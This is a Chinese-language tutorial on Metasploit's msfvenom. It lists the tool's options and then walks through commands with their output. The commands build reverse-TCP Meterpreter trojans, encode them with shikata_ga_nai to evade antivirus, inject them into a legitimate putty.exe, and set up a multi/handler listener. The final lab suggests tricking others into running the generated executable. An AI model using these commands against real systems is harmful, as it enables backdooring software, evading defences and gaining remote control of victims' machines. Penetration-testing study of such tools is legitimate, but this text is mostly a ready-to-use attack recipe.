msfvenom详解

msfvenom 介绍

metasploit-framework旗下的msfpayload(荷载生成器),msfencoder(编码器),msfcli(监听接口)已经被整合成msfvenom。
可以利用msfvenom生成木马程序,并且目标机上执行,在本地做监听

#msfvenom 参数介绍

help

> msfvenom -h
DL is deprecated, please use Fiddle
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: F:/Tools/PentestBox/bin/metasploit-framework/msfvenom [options] <var=val>

Options:
    -p, --payload       <payload>    Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options            List the payload's standard options
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled       <length>     Prepend a nopsled of [length] size on to the payload
    -f, --format        <format>     Output format (use --help-formats for a list)
        --help-formats               List available formats
    -e, --encoder       <encoder>    The encoder to use
    -a, --arch          <arch>       The architecture to use
        --platform      <platform>   The platform of the payload
        --help-platforms             List available platforms
    -s, --space         <length>     The maximum size of the resulting payload
        --encoder-space <length>     The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars     <list>       The list of characters to avoid example: '\x00\xff'
    -i, --iterations    <count>      The number of times to encode the payload
    -c, --add-code      <path>       Specify an additional win32 shellcode file to include
    -x, --template      <path>       Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --out           <path>       Save the payload
    -v, --var-name      <name>       Specify a custom variable name to use for certain output formats
        --smallest                   Generate the smallest possible payload
    -h, --help                       Show this message

参数:

-p 选择载荷
    --payload-options  列出有效载荷的标准选项
-l 载荷列表
-n 空字段模块(绕过和免杀)
-f 生成的文件格式
-e 编码方式
-a 架构
    --platform  有效载荷的平台
    --help-platforms  列出可用的平台
-s 载荷最大大小
    --encoder-space  编码有效载荷的最大大小(默认为-s值)
-b 在生成的程序中避免出现的值 比如: &#039;\x00\xff&#039;
-i 编码有效载荷的次数
-c 指定一个附加的win32 shellcode文件
-x 指定用作模板的自定义可执行文件
-k 保留模板行为,并将有效负载作为新线程注入
-o 保存有效载荷
-v 指定用于某些输出格式的自定义变量名称
    --smallest  生成最小的有效载荷
-h 帮助

payload的常见格式

最简单型

msfvenom -p <payload> <payload options> -f <format> -o <path>

测试:

> msfvenom -p windows/x64/vncinject/bind_ipv6_tcp -f exe -o payload.exe
                                                                                     DL is deprecated, please use Fiddle
                                                                                                              No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86_64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 486 bytes
Final size of exe file: 7168 bytes
Saved as: payload.exe

编码处理型

msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>

测试:

> msfvenom -p windows/meterpreter/reverse_tcp -a x86 -e x86/shikata_ga_nai -i 3 -f exe -o encoder.exe

DL is deprecated, please use Fiddle
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai chosen with final size 414
Payload size: 414 bytes
Final size of exe file: 73802 bytes
Saved as: encoder.exe

注入exe型+编码

msfvenom -p <payload> <payload options> -a <arch> --plateform <platform> -e <encoder option> -i <encoder times> -x <template> -k <keep> -f <format> -o <path>

测试:

> msfvenom -p windows/meterpreter/reverse_tcp -a x86 -e x86/shikata_ga_nai -i 3 -x 'F:/putty.exe' -f exe -o injection.exe

DL is deprecated, please use Fiddle
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai chosen with final size 414
Payload size: 414 bytes
Final size of exe file: 6144 bytes
Saved as: injection.exe

拼接型

msfvenom -c <shellcode> -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -f <format> -o <path>

测试:

> msfvenom -c "win.exe" -p windows/meterpreter/reverse_tcp -a x86 -e x86/shikata_ga_nai -i 3 -x 'F:/putty.exe' -f exe -o injection.exe

DL is deprecated, please use Fiddle
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Adding shellcode from win.exe to the payload
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 5794 (iteration=0)
x86/shikata_ga_nai succeeded with size 5823 (iteration=1)
x86/shikata_ga_nai succeeded with size 5852 (iteration=2)
x86/shikata_ga_nai chosen with final size 5852
Payload size: 5852 bytes
Final size of exe file: 11264 bytes
Saved as: injection.exe

payload生成

主要使用-a与-p这两个选项,用-l列出payload列表。
直接在payload里指定architecture就可以、

可执行格式

> msfvenom --help-platforms

DL is deprecated, please use Fiddle
Platforms
        ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe, windows, netware, android, java

payload

到目前共有450多个payload,大不同的操作平台windows/Linux/osx/Android和不同的编程语言Python/PHP等

> msfvenom -l payload

搜索:

msfvenom -l | grep windows | grep x64 | grep tcp

绕过免杀

nops选项

> msfvenom -l nops

DL is deprecated, please use Fiddle

Framework NOPs (8 total)
========================

    Name             Description
    ----             -----------
    armle/simple     Simple NOP generator
    php/generic      Generates harmless padding for PHP scripts
    ppc/simple       Simple NOP generator
    sparc/random     SPARC NOP generator
    tty/generic      Generates harmless padding for TTY input
    x64/simple       An x64 single/multi byte NOP instruction generator.
    x86/opty2        Opty2 multi-byte NOP generator
    x86/single_byte  Single-byte NOP generator

payload生成器Veil-Evasion (免杀效果好)
https://github.com/Veil-Framework/Veil-Evasion
现在Veil 3.0

编码方法

相关编码方法

> msfvenom -l encoders


其中,excellent级别的共有两个:

x86/shikata_ga_nai
cmd/powershell_base64

系统架构

架构

Arch:x86  是指生成的payload只能在32位系统运行
Arch:x86_64 是指模块同时兼容32位操作系统和64位操作系统
Arch:x64  是指生成的payload只能在64位系统运行

注意

有的payload的选项为多个:Arch:x86_64,x64
这里你就需要-a参数选择一个系统架构。
同时注意以下:size(大小),rank(等级),exitfunc(退出方法)

统一

需要注意的是软件的架构/payload的架构/目标系统的架构
三者一定要统一(x86/x86_64/x64),否则会出错。

举例1:
payload/windows/x64/meterpreter_reverse_tcp

> msfvenom -p windows/x64/meterpreter_reverse_tcp --payload-option

DL is deprecated, please use Fiddle
Options for payload/windows/x64/meterpreter_reverse_tcp:


       Name: Windows Meterpreter Shell, Reverse TCP Inline x64
     Module: payload/windows/x64/meterpreter_reverse_tcp
   Platform: Windows
       Arch: x64, x86_64
Needs Admin: No
 Total size: 1189423
       Rank: Normal

Provided by:
    OJ Reeves
    sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name        Current Setting  Required  Description
----        ---------------  --------  -----------
EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS                   no        Comma-separate list of extensions to load
EXTINIT                      no        Initialization strings for extensions
LHOST                        yes       The listen address
LPORT       4444             yes       The listen port

举例2:
windows/x64/meterpreter/reverse_tcp

load/windows/x64/meterpreter/reverse_tcp:


       Name: Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
     Module: payload/windows/x64/meterpreter/reverse_tcp
   Platform: Windows
       Arch: x86_64
Needs Admin: No
 Total size: 449
       Rank: Normal

Provided by:
    skape <mmiller@hick.org>
    sf <stephen_fewer@harmonysecurity.com>
    OJ Reeves

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

Description:
  Inject the meterpreter server DLL via the Reflective

从Arch看出,第一个可以用于x64, x86_64而第二个只能x86_64。
这是需要注意的地方。

实验

生成payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.66.40 lport=4444 -f exe X > win.exe


还可以做一些编码,加壳,绕过免杀。
发送诱导他人执行文件。

监听

msfconsole设置监听

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverset_tcp
[-] The value specified for payload is not valid.
msf exploit(handler) > set lhost 192.168.66.40
lhost => 192.168.66.40
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.66.40:4444
[*] Starting the payload handler...


验证